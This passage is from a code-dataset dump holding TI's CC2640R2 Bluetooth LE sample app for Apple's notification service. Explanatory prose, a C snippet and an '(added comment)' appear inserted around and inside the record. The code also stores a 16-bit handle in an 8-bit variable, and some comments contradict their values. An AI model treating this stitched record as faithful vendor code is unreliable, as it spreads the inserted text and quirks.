Ancs_queueNewNotif(gattMsgEvent_t *pMsg);\nextern void Ancs_popAllNotifsFromQueue(void);\nextern void Ancs_acceptIncomingCall(void);\nextern void Ancs_declineIncomingCall(void);\n\n\n/*********************************************************************\n *********************************************************************/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ANCS_H */\n"
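To make the Control Point command layout above concrete, a sketch that assembles a "Get Notification Attributes" request for a notification's Title. The helper name, buffer sizing, and the 32-byte max length are illustrative; the attribute-ID plus two-byte max-length layout follows Apple's ANCS specification:

```c
#include <string.h>
#include "ancs.h"

/* Sketch: build a Get Notification Attributes command asking for the
 * Title of one notification. Returns the number of bytes written; the
 * resulting buffer would be written to the Control Point over GATT. */
static uint8_t buildGetTitleCmd(uint8_t buf[8],
                                const uint8_t notifUID[ANCS_NOTIF_UID_LENGTH])
{
    uint8_t i = 0;

    buf[i++] = COMMAND_ID_GET_NOTIFICATION_ATTRIBUTES;  /* 0x00 */
    memcpy(&buf[i], notifUID, ANCS_NOTIF_UID_LENGTH);   /* 4-byte UID */
    i += ANCS_NOTIF_UID_LENGTH;
    buf[i++] = NOTIFICATION_ATTRIBUTE_ID_TITLE;         /* attribute ID 1 */
    buf[i++] = 0x20;                                    /* max length LSB (32) */
    buf[i++] = 0x00;                                    /* max length MSB */

    return i;  /* 8 bytes total */
}
```

The iOS device then answers over the Data Source characteristic, which is why the discovery state machine above must have located and subscribed to that CCCD first.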
},
{
"alpha_fraction": 0.6067489981651306,
"alphanum_fraction": 0.6199301481246948,
"avg_line_length": 33.71276092529297,
"blob_id": "ed9b3d36eada1c87c195c6ac5cf48450f3228d79",
"content_id": "951be183662097b76bc37813db399b486eaef4b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 65017,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 1873,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/bleapps/ancs/src/app/ancs_app.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file ancs_app.c\n\n @brief This file contains the ANCS Application sample application for use\n with the CC2640R2 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *****************************************************************************/\n\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/knl/Clock.h>\n#include <ti/sysbios/knl/Event.h>\n#include <ti/sysbios/knl/Queue.h>\n#include <ti/display/Display.h>\n\n#include <icall.h>\n#include \"util.h\"\n/* This Header file contains all BLE API and icall structure definition */\n#include \"icall_ble_api.h\"\n\n#include \"devinfoservice.h\"\n\n#include \"ll_common.h\"\n\n#include \"peripheral.h\"\n\n#ifdef USE_RCOSC\n#include \"rcosc_calibration.h\"\n#endif //USE_RCOSC\n\n#include \"board.h\"\n\n// ANCS App includes.\n#include \"board_key.h\"\n#include \"ancs_app.h\"\n#include \"ancs.h\"\n\n/*********************************************************************\n * CONSTANTS\n */\n\n// Advertising interval when device is discoverable (units of 625us, 160=100ms)\n#define DEFAULT_ADVERTISING_INTERVAL 160\n\n// General discoverable mode: advertise indefinitely\n#define DEFAULT_DISCOVERABLE_MODE GAP_ADTYPE_FLAGS_GENERAL\n\n// Minimum connection interval (units of 1.25ms, 80=100ms) for automatic\n// parameter update request\n#define DEFAULT_DESIRED_MIN_CONN_INTERVAL 6\n\n// Maximum connection interval (units of 1.25ms, 800=1000ms) for automatic\n// parameter update request\n#define DEFAULT_DESIRED_MAX_CONN_INTERVAL 6\n\n// Slave latency to use for automatic parameter update request\n#define DEFAULT_DESIRED_SLAVE_LATENCY 0\n\n// Supervision timeout value (units of 10ms, 1000=10s) for 
automatic parameter\n// update request\n#define DEFAULT_DESIRED_CONN_TIMEOUT 1000\n\n// After the connection is formed, the peripheral waits until the central\n// device asks for its preferred connection parameters\n#define DEFAULT_ENABLE_UPDATE_REQUEST GAPROLE_LINK_PARAM_UPDATE_WAIT_REMOTE_PARAMS\n\n// Connection Pause Peripheral time value (in seconds)\n#define DEFAULT_CONN_PAUSE_PERIPHERAL 6\n\n// How often to perform periodic event (in msec)\n#define ANCSAPP_PERIODIC_EVT_PERIOD 5000\n\n// Application specific event ID for HCI Connection Event End Events\n#define ANCSAPP_HCI_CONN_EVT_END_EVT 0x0001\n\n// Type of Display to open\n#if !defined(Display_DISABLE_ALL)\n #if defined(BOARD_DISPLAY_USE_LCD) && (BOARD_DISPLAY_USE_LCD!=0)\n #define ANCSAPP_DISPLAY_TYPE Display_Type_LCD\n #elif defined (BOARD_DISPLAY_USE_UART) && (BOARD_DISPLAY_USE_UART!=0)\n #define ANCSAPP_DISPLAY_TYPE Display_Type_UART\n #else // !BOARD_DISPLAY_USE_LCD && !BOARD_DISPLAY_USE_UART\n #define ANCSAPP_DISPLAY_TYPE 0 // Option not supported\n #endif // BOARD_DISPLAY_USE_LCD && BOARD_DISPLAY_USE_UART\n#else // BOARD_DISPLAY_USE_LCD && BOARD_DISPLAY_USE_UART\n #define ANCSAPP_DISPLAY_TYPE 0 // No Display\n#endif // !Display_DISABLE_ALL\n\n// Task configuration\n#define ANCSAPP_TASK_PRIORITY 1\n\n#ifndef ANCSAPP_TASK_STACK_SIZE\n#define ANCSAPP_TASK_STACK_SIZE 644\n#endif\n\n#define IO_BUTTON_LEFT 8\n\n#define IO_BUTTON_RIGHT 16\n\n#define IO_BUTTON_BOTH 24\n\n// ANCS: 7905F431-B5CE-4E99-A40F-4B1E122D00D0\n#define ANCSAPP_ANCS_SVC_UUID 0xD0, 0x00, 0x2D, 0x12, 0x1E, 0x4B, 0x0F, 0xA4, 0x99, 0x4E, 0xCE, 0xB5, 0x31, 0xF4, 0x05, 0x79\n// Notification Source: UUID 9FBF120D-6301-42D9-8C58-25E699A21DBD (notifiable)\n#define ANCSAPP_NOTIF_SRC_CHAR_UUID 0x1DBD\n// Control point: UUID 69D1D8F3-45E1-49A8-9821-9BBDFDAAD9D9 (writable with response)\n#define ANCSAPP_CTRL_PT_CHAR_UUID 0xD9D9\n// Data Source: UUID 22EAC6E9-24D6-4BB5-BE44-B36ACE7C7BFB (notifiable)\n#define ANCSAPP_DATA_SRC_CHAR_UUID 0x7BFB\n\n#define CHAR_DESC_HDL_UUID128_LEN 21 // (5 + 16) bytes = 21 bytes.\n\n#define NUMBER_OF_ANCS_CHARS 3\n\n#define LAST_ANCS_CHAR 1\n\n#ifdef USE_WATCHDOG_TIMER\n #define WATCHDOG_TIMER_TIMEOUT_PERIOD 1500000 * 5 // 1 second * 5\n #define ANCSAPP_PERIODIC_EVT Event_Id_02\n#endif\n\n// Application events\n#define ANCSAPP_STATE_CHANGE_EVT 0x0001\n#define ANCSAPP_CHAR_CHANGE_EVT 0x0002\n#define ANCSAPP_PAIRING_STATE_EVT 0x0004\n#define ANCSAPP_PASSCODE_NEEDED_EVT 0x0008\n\n#define ANCSAPP_START_DISC_EVT Event_Id_00\n#define ANCSAPP_KEY_CHANGE_EVT Event_Id_01\n\n\n// Internal Events for RTOS application.\n#define ANCSAPP_ICALL_EVT ICALL_MSG_EVENT_ID // Event_Id_31\n#define ANCSAPP_QUEUE_EVT UTIL_QUEUE_EVENT_ID // Event_Id_30\n\n\n// Bitwise OR of all events to pend on.\n#ifdef USE_WATCHDOG_TIMER\n #define ANCSAPP_ALL_EVENTS (ANCSAPP_ICALL_EVT | \\\n ANCSAPP_QUEUE_EVT | \\\n ANCSAPP_KEY_CHANGE_EVT | \\\n ANCSAPP_START_DISC_EVT | \\\n ANCSAPP_PERIODIC_EVT)\n#else\n #define ANCSAPP_ALL_EVENTS (ANCSAPP_ICALL_EVT | \\\n ANCSAPP_QUEUE_EVT | \\\n ANCSAPP_KEY_CHANGE_EVT | \\\n ANCSAPP_START_DISC_EVT)\n#endif\n\n// Application states\nenum\n{\n ANCS_STATE_IDLE = 0,\n ANCS_STATE_DISCOVERY,\n ANCS_STATE_READY,\n};\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n// App event passed from profiles.\ntypedef struct\n{\n appEvtHdr_t hdr; // event header.\n uint8_t *pData; // event data\n} ancsAppEvt_t;\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n// Store 
discovered handles\nuint16_t Ancs_handleCache[HDL_CACHE_LEN];\n\n// Display Interface\nDisplay_Handle dispHandle = NULL;\n\n// Watchdog handle\nWatchdog_Handle watchdogHandle;\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\nstatic uint8_t discoveryState = ANCS_EXCHANGE_MTU;\n\n// The current state of the ANCS application.\nstatic uint8_t ancsAppState = ANCS_STATE_IDLE;\n\n// Entity ID globally used to check for source and/or destination of messages\nstatic ICall_EntityID selfEntity;\n\n// Event globally used to post local events and pend on system and\n// local events.\nstatic ICall_SyncHandle syncEvent;\n\n#ifdef USE_WATCHDOG_TIMER\n // Clock instances for internal periodic events.\n static Clock_Struct periodicClock;\n#endif\n\n// Queue object used for app messages\nstatic Queue_Struct appMsg;\nstatic Queue_Handle appMsgQueue;\n\n// Task configuration\nTask_Struct ancsAppTask;\nChar ancsAppTaskStack[ANCSAPP_TASK_STACK_SIZE];\n\n// Scan response data (max size = 31 bytes)\nstatic uint8_t scanRspData[] =\n{\n // complete name\n 0x0A,// length of this data\n GAP_ADTYPE_LOCAL_NAME_COMPLETE, 'A', 'N', 'C', 'S', ' ', 'D', 'e', 'm', 'o',\n\n // connection interval range\n 0x05, // length of this data\n GAP_ADTYPE_SLAVE_CONN_INTERVAL_RANGE,\n LO_UINT16(DEFAULT_DESIRED_MIN_CONN_INTERVAL), // 100ms\n HI_UINT16(DEFAULT_DESIRED_MIN_CONN_INTERVAL),\n LO_UINT16(DEFAULT_DESIRED_MAX_CONN_INTERVAL), // 1s\n HI_UINT16(DEFAULT_DESIRED_MAX_CONN_INTERVAL),\n\n // Tx power level\n 0x02, // length of this data\n GAP_ADTYPE_POWER_LEVEL,\n 0 // 0dBm\n};\n\n// Advertisement data (max size = 31 bytes, though this is\n// best kept short to conserve power while advertising)\nstatic uint8_t advertData[] =\n{\n // Flags; this sets the device to use limited discoverable\n // mode (advertises for 30 seconds at a time) instead of general\n // discoverable mode (advertises indefinitely)\n 0x02,// length of this data\n GAP_ADTYPE_FLAGS,\n DEFAULT_DISCOVERABLE_MODE | GAP_ADTYPE_FLAGS_BREDR_NOT_SUPPORTED,\n // Service Solicitation: this peripheral (NC) is looking for the ANCS\n // on the iOS device. 
As per Apple Bluetooth Design Guidelines, soliciting\n // the ANCS will cause the device to show up in the iOS settings app.\n 0x11, // length of this data\n GAP_ADTYPE_SERVICES_LIST_128BIT,\n // The ANCS's UUID.\n ANCSAPP_ANCS_SVC_UUID\n};\n\n// GAP GATT Attributes\nstatic uint8_t attDeviceName[GAP_DEVICE_NAME_LEN] = \"ANCS Demo\";\n\n// Globals used for ATT Response retransmission\nstatic gattMsgEvent_t *pAttRsp = NULL;\nstatic uint8_t rspTxRetry = 0;\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\n\nstatic void AncsApp_init( void );\nstatic void AncsApp_taskFxn(UArg a0, UArg a1);\nstatic uint8_t AncsApp_processStackMsg(ICall_Hdr *pMsg);\nstatic uint8_t AncsApp_processGATTMsg(gattMsgEvent_t *pMsg);\nstatic void AncsApp_processAppMsg(ancsAppEvt_t *pMsg);\nstatic void AncsApp_processStateChangeEvt(gaprole_States_t newState);\nstatic void AncsApp_sendAttRsp(void);\nstatic void AncsApp_freeAttRsp(uint8_t status);\nstatic void AncsApp_passcodeCB(uint8_t *deviceAddr, uint16_t connHandle, uint8_t uiInputs, uint8_t uiOutputs);\nstatic void AncsApp_pairStateCB(uint16_t connHandle, uint8_t state, uint8_t status);\nstatic void AncsApp_processPairState(uint8_t state, uint8_t status);\nstatic void AncsApp_processPasscode(uint8_t uiOutputs);\nstatic void AncsApp_stateChangeCB(gaprole_States_t newState);\nstatic uint8_t AncsApp_enqueueMsg(uint8_t event, uint8_t state, uint8_t *pData);\n/********************ANCS APP FUNCTIONS********************/\n// Board I/O\nstatic void AncsApp_keyPressCB(uint8 keys);\nstatic void AncsApp_handleKeysEvt(uint8_t keys);\n\n// ANCS service discovery\nstatic void AncsApp_discoverService(gattMsgEvent_t *pMsg);\n\n#ifdef USE_WATCHDOG_TIMER\n /********************WATCHDOG FUNCTIONS********************/\n static void watchdogCallback(uintptr_t unused);\n static void AncsApp_performPeriodicTask(void);\n static void AncsApp_clockHandler(UArg arg);\n#endif\n\n/*********************************************************************\n * EXTERN FUNCTIONS\n */\nextern void AssertHandler(uint8 assertCause, uint8 assertSubcause);\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n\n// Peripheral GAPRole Callbacks\nstatic gapRolesCBs_t ancsApp_gapRoleCBs =\n{\n AncsApp_stateChangeCB // GAPRole State Change Callbacks\n};\n\n// GAP Bond Manager Callbacks\n// These callbacks handle the passcode and pairing state events raised by\n// the GAP Bond Manager during pairing and bonding.\nstatic gapBondCBs_t ancsApp_BondMgrCBs =\n{\n (pfnPasscodeCB_t) AncsApp_passcodeCB, // Passcode callback\n AncsApp_pairStateCB // Pairing / Bonding state Callback\n};\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn AncsApp_createTask\n *\n * @brief Task creation function for the ANCS app.\n *\n * @param None.\n *\n * @return None.\n */\nvoid AncsApp_createTask(void)\n{\n Task_Params taskParams;\n\n // Configure task\n Task_Params_init(&taskParams);\n taskParams.stack = ancsAppTaskStack;\n taskParams.stackSize = ANCSAPP_TASK_STACK_SIZE;\n taskParams.priority = ANCSAPP_TASK_PRIORITY;\n\n Task_construct(&ancsAppTask, AncsApp_taskFxn, &taskParams, NULL);\n}\n\n/*********************************************************************\n * @fn AncsApp_init\n *\n * @brief Called during initialization and contains application\n * specific initialization (i.e. 
hardware initialization/setup,\n * table initialization, power up notification, etc), and\n * profile initialization/setup.\n *\n * @param None.\n *\n * @return None.\n */\nstatic void AncsApp_init(void)\n{\n // ******************************************************************\n // NO STACK API CALLS CAN OCCUR BEFORE THIS CALL TO ICall_registerApp\n // ******************************************************************\n // Register the current thread as an ICall dispatcher application\n // so that the application can send and receive messages.\n ICall_registerApp(&selfEntity, &syncEvent);\n\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_MINUS_21_DBM);\n\n#ifdef USE_RCOSC\n RCOSC_enableCalibration();\n#endif // USE_RCOSC\n\n // Create an RTOS queue for message from profile to be sent to app.\n appMsgQueue = Util_constructQueue(&appMsg);\n\n // Initialize the CC2640r2's I/O\n Board_initKeys(AncsApp_keyPressCB);\n\n dispHandle = Display_open(ANCSAPP_DISPLAY_TYPE, NULL);\n\n#ifdef USE_WATCHDOG_TIMER\n // Create one-shot clocks for internal periodic events.\n Util_constructClock(&periodicClock, AncsApp_clockHandler,\n ANCSAPP_PERIODIC_EVT_PERIOD, 0, false, ANCSAPP_PERIODIC_EVT);\n\n // Call watchdog init functions\n Watchdog_init();\n Watchdog_Params params;\n Watchdog_Params_init(&params);\n params.callbackFxn = (Watchdog_Callback)watchdogCallback;\n params.resetMode = Watchdog_RESET_ON;\n params.debugStallMode = Watchdog_DEBUG_STALL_ON;\n watchdogHandle = Watchdog_open(Board_WATCHDOG0, &params);\n // 5 * 1 seconds.\n Watchdog_setReload(watchdogHandle, WATCHDOG_TIMER_TIMEOUT_PERIOD);\n#endif\n
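\n // Note (added comment): per TI's CC26xx documentation the watchdog counts\n // at ~1.5 MHz (48 MHz / 32), so WATCHDOG_TIMER_TIMEOUT_PERIOD (1500000 * 5)\n // amounts to roughly five seconds; the periodic task must clear the timer\n // before it expires.\n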
\n // Set GAP Parameters: After a connection was established, delay in seconds\n // before sending when GAPRole_SetParameter(GAPROLE_PARAM_UPDATE_ENABLE,...)\n // uses GAPROLE_LINK_PARAM_UPDATE_INITIATE_BOTH_PARAMS or\n // GAPROLE_LINK_PARAM_UPDATE_INITIATE_APP_PARAMS\n // For current defaults, this has no effect.\n GAP_SetParamValue(TGAP_CONN_PAUSE_PERIPHERAL, DEFAULT_CONN_PAUSE_PERIPHERAL);\n\n // Setup the Peripheral GAPRole Profile. For more information see the User's\n // Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html/\n {\n // Device starts advertising upon initialization of GAP\n uint8_t initialAdvertEnable = TRUE;\n\n // By setting this to zero, the device will go into the waiting state after\n // being discoverable for 30.72 seconds, and will not begin advertising again\n // until re-enabled by the application\n uint16_t advertOffTime = 0;\n\n uint8_t enableUpdateRequest = DEFAULT_ENABLE_UPDATE_REQUEST;\n uint16_t desiredMinInterval = DEFAULT_DESIRED_MIN_CONN_INTERVAL;\n uint16_t desiredMaxInterval = DEFAULT_DESIRED_MAX_CONN_INTERVAL;\n uint16_t desiredSlaveLatency = DEFAULT_DESIRED_SLAVE_LATENCY;\n uint16_t desiredConnTimeout = DEFAULT_DESIRED_CONN_TIMEOUT;\n\n // Set the Peripheral GAPRole Parameters\n GAPRole_SetParameter(GAPROLE_ADVERT_ENABLED, sizeof(uint8_t),\n &initialAdvertEnable);\n GAPRole_SetParameter(GAPROLE_ADVERT_OFF_TIME, sizeof(uint16_t),\n &advertOffTime);\n\n GAPRole_SetParameter(GAPROLE_SCAN_RSP_DATA, sizeof(scanRspData), scanRspData);\n GAPRole_SetParameter(GAPROLE_ADVERT_DATA, sizeof(advertData), advertData);\n\n GAPRole_SetParameter(GAPROLE_PARAM_UPDATE_ENABLE, sizeof(uint8_t),\n &enableUpdateRequest);\n GAPRole_SetParameter(GAPROLE_MIN_CONN_INTERVAL, sizeof(uint16_t),\n &desiredMinInterval);\n GAPRole_SetParameter(GAPROLE_MAX_CONN_INTERVAL, sizeof(uint16_t),\n &desiredMaxInterval);\n GAPRole_SetParameter(GAPROLE_SLAVE_LATENCY, sizeof(uint16_t),\n &desiredSlaveLatency);\n GAPRole_SetParameter(GAPROLE_TIMEOUT_MULTIPLIER, sizeof(uint16_t),\n &desiredConnTimeout);\n }\n\n // Set the Device Name characteristic in the GAP GATT Service\n // For more information, see the section in the User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html\n GGS_SetParameter(GGS_DEVICE_NAME_ATT, GAP_DEVICE_NAME_LEN, attDeviceName);\n\n // Set GAP Parameters to set the advertising interval\n // For more information, see the GAP section of the User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html\n {\n // Use the same interval for general and limited advertising.\n // Note that only general advertising will occur based on the above configuration\n uint16_t advInt = DEFAULT_ADVERTISING_INTERVAL;\n\n GAP_SetParamValue(TGAP_LIM_DISC_ADV_INT_MIN, advInt);\n GAP_SetParamValue(TGAP_LIM_DISC_ADV_INT_MAX, advInt);\n GAP_SetParamValue(TGAP_GEN_DISC_ADV_INT_MIN, advInt);\n GAP_SetParamValue(TGAP_GEN_DISC_ADV_INT_MAX, advInt);\n }\n\n // Setup the GAP Bond Manager. For more information see the section in the\n // User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html/\n {\n // Don't send a pairing request after connecting; the peer device must\n // initiate pairing\n uint8_t pairMode = GAPBOND_PAIRING_MODE_WAIT_FOR_REQ;\n // Use authenticated pairing: require passcode.\n uint8_t mitm = TRUE;\n // This device only has display capabilities. Therefore, it will display the\n // passcode during pairing. 
However, since the default passcode is being\n // used, there is no need to display anything.\n uint8_t ioCap = GAPBOND_IO_CAP_NO_INPUT_NO_OUTPUT;\n // Request bonding (storing long-term keys for re-encryption upon subsequent\n // connections without re-pairing)\n uint8_t bonding = TRUE;\n\n GAPBondMgr_SetParameter(GAPBOND_PAIRING_MODE, sizeof(uint8_t), &pairMode);\n GAPBondMgr_SetParameter(GAPBOND_MITM_PROTECTION, sizeof(uint8_t), &mitm);\n GAPBondMgr_SetParameter(GAPBOND_IO_CAPABILITIES, sizeof(uint8_t), &ioCap);\n GAPBondMgr_SetParameter(GAPBOND_BONDING_ENABLED, sizeof(uint8_t), &bonding);\n }\n\n // Initialize GATT attributes\n GGS_AddService(GATT_ALL_SERVICES); // GAP GATT Service\n GATTServApp_AddService(GATT_ALL_SERVICES); // GATT Service\n DevInfo_AddService(); // Device Information Service\n\n // For ANCS, the device must register as a GATT client, whereas the\n // iPhone acts as a GATT server.\n VOID GATT_InitClient();\n GATT_RegisterForInd(selfEntity);\n\n // Start the Device\n VOID GAPRole_StartDevice(&ancsApp_gapRoleCBs);\n\n // Start Bond Manager and register callback\n VOID GAPBondMgr_Register(&ancsApp_BondMgrCBs);\n\n // Register with GAP for HCI/Host messages. This is needed to receive HCI\n // events. For more information, see the section in the User's Guide:\n // http://software-dl.ti.com/lprf/sdg-latest/html\n GAP_RegisterForMsgs(selfEntity);\n\n // Register for GATT local events and ATT Responses pending for transmission\n GATT_RegisterForMsgs(selfEntity);\n\n //Set default values for Data Length Extension\n {\n //Set initial values to maximum, RX is set to max. by default(251 octets, 2120us)\n #define APP_SUGGESTED_PDU_SIZE 251 //default is 27 octets(TX)\n #define APP_SUGGESTED_TX_TIME 2120 //default is 328us(TX)\n\n //This API is documented in hci.h\n //See the LE Data Length Extension section in the BLE-Stack User's Guide for information on using this command:\n //http://software-dl.ti.com/lprf/sdg-latest/html/cc2640/index.html\n //HCI_LE_WriteSuggestedDefaultDataLenCmd(APP_SUGGESTED_PDU_SIZE, APP_SUGGESTED_TX_TIME);\n }\n\n#if !defined (USE_LL_CONN_PARAM_UPDATE)\n // Get the currently set local supported LE features\n // The HCI will generate an HCI event that will get received in the main\n // loop\n HCI_LE_ReadLocalSupportedFeaturesCmd();\n#endif // !defined (USE_LL_CONN_PARAM_UPDATE)\n\n Display_print0(dispHandle, 0, 0, \"ANCS Demo\");\n}\n\n/*********************************************************************\n * @fn AncsApp_taskFxn\n *\n * @brief Application task entry point for the ANCS App.\n *\n * @param a0, a1 - not used.\n *\n * @return None.\n */\nstatic void AncsApp_taskFxn(UArg a0, UArg a1)\n{\n // Initialize application\n AncsApp_init();\n\n // Application main loop\n for (;;)\n {\n uint32_t events;\n\n // Waits for an event to be posted associated with the calling thread.\n // Note that an event associated with a thread is posted when a\n // message is queued to the message receive queue of the thread\n events = Event_pend(syncEvent, Event_Id_NONE, ANCSAPP_ALL_EVENTS,\n ICALL_TIMEOUT_FOREVER);\n\n if (events)\n {\n ICall_EntityID dest;\n ICall_ServiceEnum src;\n ICall_HciExtEvt *pMsg = NULL;\n\n // Fetch any available messages that might have been sent from the stack\n if (ICall_fetchServiceMsg(&src, &dest,\n (void **)&pMsg) == ICALL_ERRNO_SUCCESS)\n {\n uint8 safeToDealloc = TRUE;\n\n if ((src == ICALL_SERVICE_CLASS_BLE) && (dest == selfEntity))\n {\n ICall_Stack_Event *pEvt = (ICall_Stack_Event *)pMsg;\n\n // Check for BLE stack events first\n if 
(pEvt->signature == 0xffff)\n {\n // The GATT server might have returned a blePending as it was trying\n // to process an ATT Response. Now that we finished with this\n // connection event, let's try sending any remaining ATT Responses\n // on the next connection event.\n if (pEvt->event_flag & ANCSAPP_HCI_CONN_EVT_END_EVT)\n {\n // Try to retransmit pending ATT Response (if any)\n AncsApp_sendAttRsp();\n }\n }\n else\n {\n // Process inter-task message\n safeToDealloc = AncsApp_processStackMsg((ICall_Hdr *)pMsg);\n }\n }\n\n if (pMsg && safeToDealloc)\n {\n ICall_freeMsg(pMsg);\n }\n }\n\n // If RTOS queue is not empty, process app message.\n if (events & ANCSAPP_QUEUE_EVT)\n {\n while (!Queue_empty(appMsgQueue))\n {\n ancsAppEvt_t *pMsg = (ancsAppEvt_t *)Util_dequeueMsg(appMsgQueue);\n if (pMsg)\n {\n // Process message.\n AncsApp_processAppMsg(pMsg);\n\n // Free the space from the message.\n ICall_free(pMsg);\n }\n }\n }\n // Service discovery event.\n if (events & ANCSAPP_START_DISC_EVT)\n {\n //This event will kick off service discovery.\n //The event is only called once, when the GAPROLE is connected\n // discoveryState = ANCS_DISC_SERVICE;\n AncsApp_discoverService(NULL);\n }\n#ifdef USE_WATCHDOG_TIMER\n // Periodic Event for the WDT\n if (events & ANCSAPP_PERIODIC_EVT)\n {\n Util_startClock(&periodicClock);\n\n // Perform periodic application task\n AncsApp_performPeriodicTask();\n }\n#endif\n }\n }\n}\n\n/*********************************************************************\n * @fn AncsApp_processStackMsg\n *\n * @brief Process an incoming stack message.\n *\n * @param pMsg - message to process\n *\n * @return TRUE if safe to deallocate incoming message, FALSE otherwise.\n */\nstatic uint8_t AncsApp_processStackMsg(ICall_Hdr *pMsg)\n{\n uint8_t safeToDealloc = TRUE;\n\n switch (pMsg->event)\n {\n case GATT_MSG_EVENT:\n // Process GATT message\n safeToDealloc = AncsApp_processGATTMsg((gattMsgEvent_t *)pMsg);\n break;\n\n case HCI_GAP_EVENT_EVENT:\n {\n\n // Process HCI message\n switch(pMsg->status)\n {\n case HCI_COMMAND_COMPLETE_EVENT_CODE:\n // Process HCI Command Complete Event\n {\n\n#if !defined (USE_LL_CONN_PARAM_UPDATE)\n // This code will disable the use of the LL_CONNECTION_PARAM_REQ\n // control procedure (for connection parameter updates, the\n // L2CAP Connection Parameter Update procedure will be used\n // instead). 
To re-enable the LL_CONNECTION_PARAM_REQ control\n // procedures, define the symbol USE_LL_CONN_PARAM_UPDATE\n // The L2CAP Connection Parameter Update procedure is used to\n // support a delta between the minimum and maximum connection\n // intervals required by some iOS devices.\n\n // Parse Command Complete Event for opcode and status\n hciEvt_CmdComplete_t* command_complete = (hciEvt_CmdComplete_t*) pMsg;\n uint8_t pktStatus = command_complete->pReturnParam[0];\n\n //find which command this command complete is for\n switch (command_complete->cmdOpcode)\n {\n case HCI_LE_READ_LOCAL_SUPPORTED_FEATURES:\n {\n if (pktStatus == SUCCESS)\n {\n uint8_t featSet[8];\n\n // Get current feature set from received event (bits 1-9\n // of the returned data)\n memcpy( featSet, &command_complete->pReturnParam[1], 8 );\n\n // Clear bit 1 of byte 0 of feature set to disable LL\n // Connection Parameter Updates\n CLR_FEATURE_FLAG( featSet[0], LL_FEATURE_CONN_PARAMS_REQ );\n\n // Update controller with modified features\n HCI_EXT_SetLocalSupportedFeaturesCmd( featSet );\n }\n }\n break;\n\n default:\n //do nothing\n break;\n }\n#endif // !defined (USE_LL_CONN_PARAM_UPDATE)\n\n }\n break;\n\n case HCI_BLE_HARDWARE_ERROR_EVENT_CODE:\n AssertHandler(HAL_ASSERT_CAUSE_HARDWARE_ERROR,0);\n break;\n\n default:\n break;\n }\n }\n break;\n\n default:\n // do nothing\n break;\n\n }\n\n return (safeToDealloc);\n}\n\n/*********************************************************************\n * @fn AncsApp_processGATTMsg\n *\n * @brief Process GATT messages and events.\n *\n * @return TRUE if safe to deallocate incoming message, FALSE otherwise.\n */\nstatic uint8_t AncsApp_processGATTMsg(gattMsgEvent_t *pMsg)\n{\n // Assume that all initial GATT messages pertain to the discovery\n // process while the app is in the ANCS_STATE_DISCOVERY state.\n if(ancsAppState == ANCS_STATE_DISCOVERY)\n {\n AncsApp_discoverService(pMsg);\n }\n else if (pMsg->method == ATT_FLOW_CTRL_VIOLATED_EVENT)\n {\n // ATT request-response or indication-confirmation flow control is\n // violated. All subsequent ATT requests or indications will be dropped.\n // The app is informed in case it wants to drop the connection.\n\n // Display the opcode of the message that caused the violation.\n Display_print1(dispHandle, 5, 0, \"FC Violated: %d\", pMsg->msg.flowCtrlEvt.opcode);\n }\n else if (pMsg->method == ATT_HANDLE_VALUE_NOTI || pMsg->method == ATT_HANDLE_VALUE_IND)\n {\n // If we receive a GATT notification, we can assume it pertains to ANCS\n // because we only subscribe to notifications from the Notification Source\n // and Data Source.\n\n // This variable is used just to make the code look clearer for the\n // two conditionals below :)\n uint8_t notifHandle = pMsg->msg.handleValueNoti.handle;\n\n // Check if the handle matches the handle of the Notification Source\n // stored in the handle cache. If so, store the notification in the queue.\n if ( notifHandle == Ancs_handleCache[ANCS_NOTIF_SCR_HDL_START])\n {\n Ancs_queueNewNotif(pMsg);\n }\n\n // If it is not from the Notification Source we check to see if it is from\n // the Data Source by checking if the handle is equal to the Data Source\n // Start handle stored in the cache. 
